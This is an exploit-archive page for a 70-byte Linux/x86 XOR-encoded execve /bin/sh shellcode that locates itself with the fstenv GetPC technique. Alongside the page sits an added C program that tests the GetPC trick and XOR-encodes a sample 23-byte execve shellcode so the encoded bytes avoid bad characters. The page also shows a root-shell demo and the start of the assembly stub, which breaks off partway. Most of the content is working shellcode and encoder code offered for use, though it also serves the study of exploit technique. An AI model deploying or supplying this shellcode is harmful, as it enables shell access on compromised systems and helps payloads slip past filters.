Exploits / Vulnerability Discovered: 2021-06-10
Type: shellcode
Platform: linux_x86
This exploit/vulnerability, "Linux/x86 execve /bin/sh shellcode (fstenv eip getpc technique) (70 bytes, xor encoded)", is published for educational purposes only; if you use it, you do so at your own risk.
/***
shellcode with an XOR decoder stub that locates itself with the x87 FPU fstenv instruction (GetPC technique)
and then spawns a /bin/sh shell
fstenv dumps the 28-byte FPU environment; bytes 12-15 of it hold the FPU instruction pointer (FIP),
the address of the last non-control x87 instruction executed (here fldz), so the stub learns its own
address at run time without a jmp-call-pop sequence
(note: fstenv is an x87 instruction, not MMX, despite the file name)
Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c
./mmx-xor-decoder_eip
Shellcode Length: 70
# id
uid=0(root) gid=0(root) groups=0(root)
# ps -p $$
PID TTY TIME CMD
24045 pts/4 00:00:00 sh
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
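The GetPC trick and the XOR wrapping described in the comment above, as an added C example that is not part of the original shellcode or d7x's code. The first function checks the fstenv claim directly: it runs fldz, dumps the x87 environment with fnstenv, and compares the FIP field at offset 12 with the address of that fldz (which is why storing the environment at [esp-0xc] lands FIP at [esp] for the pop). The rest is the build-side encoder the decoder stub presupposes: it picks a single-byte XOR key that keeps every encoded byte out of a bad-character set, encodes, and decodes the same way the stub would. Assumptions: the 23-byte execve("/bin//sh") sequence is a constructed stand-in for the page's 70-byte payload, the bad-character set {0x00, 0x0a, 0x0d} is an assumed constraint, and all function names are mine.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offset of the FPU instruction pointer (FIP) inside the 28-byte x87
 * environment written by fstenv/fnstenv (32-bit protected-mode layout).
 * Storing the environment at [esp-0xc] puts FIP at [esp-0xc+12] = [esp],
 * which is why the stub on this page can simply "pop edi". */
#define FSTENV_FIP_OFFSET 12

/* Probe the GetPC trick: run fldz, dump the x87 environment, and compare the
 * recorded FIP with the address of that fldz.
 * Returns 1 on match, 0 on mismatch, -1 when not built for x86. */
int fstenv_getpc_check(void)
{
#if defined(__i386__) || defined(__x86_64__)
    struct { unsigned char b[28]; } env;
    uintptr_t fldz_addr;
    uint32_t fip;

    __asm__ volatile (
        "1:\n\t"
        "fldz\n\t"          /* non-control x87 insn: CPU records its address in FIP */
        "fnstenv %0\n\t"    /* fstenv = fwait + fnstenv; the no-wait form suffices */
        "fstp %%st(0)\n\t"  /* pop the 0.0 we pushed so the x87 stack stays balanced */
#if defined(__x86_64__)
        "leaq 1b(%%rip), %1\n\t"
#else
        "leal 1b, %1\n\t"
#endif
        : "=m"(env), "=r"(fldz_addr) : : "memory", "cc");

    memcpy(&fip, env.b + FSTENV_FIP_OFFSET, sizeof fip);
    /* The 28-byte format carries a 32-bit FIP; in 64-bit mode that is the low half. */
    return fip == (uint32_t)fldz_addr;
#else
    return -1;
#endif
}

/* Constructed sample payload (NOT the 70-byte payload on this page): the
 * classic 23-byte execve("/bin//sh") sequence. */
static const unsigned char sample_payload[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
#define SAMPLE_LEN (sizeof sample_payload - 1)

/* Bytes the encoded form must not contain. 0x00 is mandatory for any payload
 * that passes through a string copy; 0x0a/0x0d are an assumed extra restriction. */
static const unsigned char bad_chars[] = { 0x00, 0x0a, 0x0d };

static int is_bad(unsigned char c)
{
    for (size_t i = 0; i < sizeof bad_chars; i++)
        if (bad_chars[i] == c) return 1;
    return 0;
}

/* Choose a single-byte XOR key whose output avoids every bad char. Key 0x00
 * is skipped (a no-op) and a bad-char key is rejected too, because the key
 * byte has to live inside the decoder stub. Returns 0 and sets *key_out on
 * success, -1 if no single byte works (then a multi-byte scheme is needed). */
int pick_xor_key(const unsigned char *p, size_t n, unsigned char *key_out)
{
    for (unsigned k = 1; k < 256; k++) {
        size_t i;
        if (is_bad((unsigned char)k)) continue;
        for (i = 0; i < n; i++)
            if (is_bad((unsigned char)(p[i] ^ k))) break;
        if (i == n) { *key_out = (unsigned char)k; return 0; }
    }
    return -1;
}

/* What the decoder stub does at run time from the address GetPC handed it:
 * XOR every byte with the key. XOR is its own inverse, so this same loop
 * encodes at build time and decodes inside the target process. */
void xor_buf(unsigned char *buf, size_t n, unsigned char key)
{
    for (size_t i = 0; i < n; i++) buf[i] ^= key;
}

/* Encode the sample, verify the encoded bytes are clean, decode, verify the
 * round trip. Returns the chosen key on success, 0 on any failure. */
int encode_decode_roundtrip(void)
{
    unsigned char buf[SAMPLE_LEN];
    unsigned char key;

    memcpy(buf, sample_payload, SAMPLE_LEN);
    if (pick_xor_key(buf, SAMPLE_LEN, &key) != 0) return 0;
    xor_buf(buf, SAMPLE_LEN, key);
    for (size_t i = 0; i < SAMPLE_LEN; i++)
        if (is_bad(buf[i])) return 0;
    xor_buf(buf, SAMPLE_LEN, key);
    return memcmp(buf, sample_payload, SAMPLE_LEN) == 0 ? key : 0;
}

int main(void)
{
    unsigned char buf[SAMPLE_LEN], key;
    printf("fstenv GetPC probe: %d (1 = FIP matched fldz, -1 = not x86)\n",
           fstenv_getpc_check());
    if (pick_xor_key(sample_payload, SAMPLE_LEN, &key) == 0) {
        memcpy(buf, sample_payload, SAMPLE_LEN);
        xor_buf(buf, SAMPLE_LEN, key);
        printf("key 0x%02x, encoded payload:", key);
        for (size_t i = 0; i < SAMPLE_LEN; i++) printf("\\x%02x", buf[i]);
        printf("\n");
    }
    return 0;
}
```

Build with gcc -O2 -o getpc getpc.c on an x86 or x86-64 Linux host; on other architectures the probe returns -1 and only the encoder part runs. Two caveats worth keeping in mind when adapting the stub: fnstenv, fldenv, fnstsw and the other x87 control instructions do not update FIP, so a non-control instruction such as fldz must directly precede the fstenv; and the 28-byte format only carries the low 32 bits of the address, so the pop-based layout on this page is a 32-bit technique.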
/***
; shellcode assembly
global _start
section .text
_start:
fldz ; any non-control x87 instruction; the CPU records its address as FIP
fstenv [esp-0xc] ; write the 28-byte FPU environment so the FIP field (offset 12) lands at [esp]
pop edi ; edi = address of fldz (the FIP value fstenv just stored)
add edi, 37 ; 0x08048085-0x08048060 = 37: distance from fldz to decoder_value, the bytes the stub decodes